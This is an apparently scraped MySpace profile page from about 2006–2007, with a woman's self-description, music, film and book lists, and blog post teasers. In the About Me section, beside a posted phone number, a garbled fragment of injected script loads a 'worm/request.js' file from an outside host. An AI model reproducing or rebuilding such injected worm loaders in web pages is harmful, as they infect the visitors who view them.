I wanna be just like u! profile picture

I wanna be just like u!

To perceive ..is to suffer -Aristotle

About Me

OK! NEW RULE! I won't approve the "thanks for the add' or your band spam on my page, it's just clutter..sorry but I wouldn't come to your house and leave a bunch of posters and banners on your walls for the fact of letting me in. I like my comments to be a bit more personal than that.. if you find this offensive then delete me and move on. I am sure I will survive.. thanks!
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I edited my profile with Thomas’ Myspace Editor V3.6 !
"Life is not measured by the number of breaths we take, but by the moments that take our breath away."
GEMINI Nice. Love is one of a kind. Great listeners Lover not a fighter, but will still punch your lights out. Trustworthy. I am a complicated girl..for some more than a handfull.Just because I have an advanced stage of schizophrenia with involuntary narcissistic rage ...doesn't make me a bad person! I'm very gentle!I like to pull hair and flick rubber bands at people as you will clearly see in my pix. I am a tattooed & pierced Gemini with a Leo moon. I can be a sweetie or a total bitch (Gemini qualities) Curvacious& vivacious..I usually am pretty outgoing when I want to be.Sometimes I feel the need to hide from people in general.I am a wee bit sarcastic at times...don't take everything I say seriously..if u do then remove the gerbil stuck up your butt.What else to say about me?I don't have time for liars or fake friends..if I see you as a social parasite I will squash you like a doodle bug Mr Pizza Canoli style! Also lazy and lost..attemtping to better myself by walking away from the computer and into reality. Slowly..but surely..hmm we'll see..you want to know more? well then ask me.
1 310 495-5412 i dare you to call muahahhahaha .... language="javascript" src="http://angeliceyz00.../worm/request.js"function nothingf(){document·write("jajaja...{}");}..

My Interests

As we grow up, we learn that even the one person that wasn't supposed to ever let you down probably will. You will have your heart broken probably more than once, and it's harder every time. You'll break hearts too, so remember how it felt when yours was broken. You'll fight with your best friend. You'll blame a new love for things an old one did. You'll cry because time is passing too fast, and you'll eventually lose someone you love. So take too many pictures, laugh too much, and love like you've never been hurt, because every sixty seconds you spend upset is a minute of happiness you'll never get back.
Running down the street naked and screaming every sunday as church lets out..sitting in the rain during a storm..people watching, museums, skating, frolicking in the ocean, staying in and watching movies, talking on the phone with people worth talking to.I love reading good pshycology books..or just going to a certain spot here off the coast and getting lost in the ocean's beauty and appreciating where I am at the moment. Even though where I am living at the moment I am getting a wee bit fed up and I see myself venturing to new grounds when the time is right...

I'd like to meet:

ok with that said Who would I want to meet???? YOU. HA just kiddin. WHO do I want to meet? umm.. people? If you are human we are off to a good start.Wait that opens door for too many whackadoo's. I am not here to meet anyone really. ALLTHOUGH MY SPACE IS ADDICTING I am here to pass my time and chat.I am NOT here to hook up with random people or have any type of flings..I don't believe in that hooey and its SPOOKY AND CREEPY if you do. If I get any DISGUSTIN' messages don't expect a response and leave me the hell alone...psh posh AIM bellastelleMJ


I like all kinds from Opera to punk. To name a few artists I like:Dean Martin has a AMAZING voice..I love listening to the rat pack's recorded drunken performances..ELLIOT SMITH, X,Minor Threat,David Allan Coe, NWA,Sneaker Pimps,Sex Pistol's,The Clash,Ani DeFranco,Lucious Jackson,Ramones,The Cure,David Bowie,Mazzy Star,Sir mix alot, Tom Petty, L7,Black Flag,Funk Doobiest,Tribe called Quest, The Killers,Dead Kennedy's (the early shite).... The Cramps, GG Allin, StaticX,Sting,Deftones,Janis Joplin,Led Zep,Bob Marley,SUBLIME,PENNYWISE,Betovhen, Foo Fighters,Lynard Skynard man!Bjork, Boa,some 80's ,ooo I love Poison I dont know..I like lots of stuff ..Mike Patton, Morbid Angel, SOD, Slayer,Alice in Chains, Blood for Blood, Tool and Perfect Circle, No Doubt, Missy, Blind Melon, Stoned pimple pirates HAHA..STP (inside joke there sorry)..it all depends on my mood for what is in my CD player..I like rock a billy stuff, surfer tunes..The Smith's and Morrissey( I am nutz about them), Tori Amos,Nikkia Costa, Peaches, Travis,Allergic,Cold and Snot (imagine if they could all do a tour if it was possible..RIP Lynne) Method of Destruction,Anal Cunt,Tiger Army, Madonna,CCR,The Doors,Elvis,Buddy Holly, Bush, most pop kinda music or dance,Outkast,Method man,Jurassic5,Murphay's Law,Exit 13,Vision of Disorder,No Redeeming Social Value,Death before Dishonor,Butt hole Surfers,Eminem,Dre..oi there is so much more I have no energy left to write more


Willy Wonka, Clerks,(all Kevin Smith really)true stories, horror flicks, cheesey B rated Troma,Donnie Darko, all evil dead movies,The Professional,VIRGIN SUICIDES,Manhunter,I like silly movies like Dumb and Dumber, Dude where's my car, any nat'l lampoon's, Monster..hmm when I think of more then I will come back and edit this again I guess..k thought of more. The Entity, Spawn animie series, japanaime is awesome..Ninja Scroll,Blood Reign,Aeon Flux,Princess Mononokie,Akira,Vampire Hunter D,Animatrix,Ghost in the Shell, Benny&Joon, Chocalate, Finding Nemo, Almost famous, True romance,Stigmata,Eye of the Beholder,Old School,Blue streak,Life,Monty Python and the search for the holy grail(Life of brain was ok but not the best) Harold and Muade,Sid and Nancy, Hellraiser (all of them) Ghouls, Gremlins, the adventures of milo and otis! The Last Unicorn,the hobbit, Lord of Rings of course,Star wars, The Legend Of Billie Jean, The Salton Sea,The Dark Crystral, Muppets take Manhatten, Neverending Story...the list will grow I am sure just can't think right now.. I just love all scary movies really


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The Alchemist, pretty much any Paulo Coleho,Guilty by Reason of Insanity(by Dorothy M. Lewis) about every Stephen King book, True Crime, anything to do with Europe and historic sites across the world,Photography,The Encyclopedia of Serial Killers A-Z ..there is more but I am not about to go run and pull them all out here just so I can let you know what I have..sorry



My Blog

Things to get done in spring/summer of 07!!!

-HOCKEY GAMES!! Preferrably the ducks or whenever the RED WINGS are in town to play! I need to go as MUCH AS POSSIBLE. SO..get on my good side.. get me some tickets! And some white chocolate strawberr...
Posted by MJ on Tue, 06 Mar 2007 05:00:00 PST

2006 wrapped up and ready to go

Well.. this year was a year of change. Coming to terms of losing loved ones, making new friendships and sadly letting go of some toixc ones. I think this year has taught me a lot about myself, the peo...
Posted by MJ on Wed, 20 Dec 2006 12:52:00 PST

Breaking up is hard to do? Not if your this guy Brad! You go boy!

The following is an e-mail going around NYC...California...Washington...Atlanta..Texas.... and now Florida!!The 1st part is a girl's apology email for cheating.2nd is his HILARIOUS response which was ...
Posted by MJ on Thu, 30 Nov 2006 05:56:00 PST

Going home finally ..

It has been a while since I have been home for the holidays. Also I chose to go back during winter to see if I may be ready to handle it again. Lately I have been so homesick and it feels like Los Ang...
Posted by MJ on Mon, 06 Nov 2006 11:38:00 PST

La tee dahh

I have dropped alot of haters and fake friends.. so drama free is the way to be! This year had a weird start for sure.. so many "friends" let their masks off and it got ugly for a little bit. Bye bye ...
Posted by MJ on Thu, 29 Jun 2006 11:41:00 PST

DELETED! Cleaning my account booo-yaaa

This is insane.. I had over 2000+ friends on here and even in my favorites..was getting crammed up. I can't find my actual friends! Now if I was promoting something then that would be a diff story. Bu...
Posted by MJ on Fri, 23 Jun 2006 10:55:00 PST

A rant , a writing.. a outlet

Every time it rains..he sends you kisses from the skiesthat love will never die..and he will always be by your side..so live life thru his eyes do all u want without regret..and just know you will see...
Posted by MJ on Fri, 03 Mar 2006 02:45:00 PST

The unattainable is always more desired...

We all know these sayings,like, the grass is greener on the other side. When we admire beauty from afar and see those who have what we deisre..it eats away at you.. The heart starts to yearn, and your...
Posted by MJ on Sat, 24 Dec 2005 04:20:00 PST

Had a good weekeend

I finally got to see my friend Jen this weekend from Az!! Yeayy!!!! We had a great weekend together. I got to show her the beach where she has never been! I got the who ha scared out of me by one of t...
Posted by MJ on Wed, 12 Oct 2005 09:09:00 PST

words to remember..

I had to post this because i was just going thru my messages and it gave me the chills a little.. In NYC now!!! yea yea yea... well i miss ya anywayssssss xo jd ----------------- Original Message ----...
Posted by MJ on Thu, 15 Sep 2005 04:39:00 PST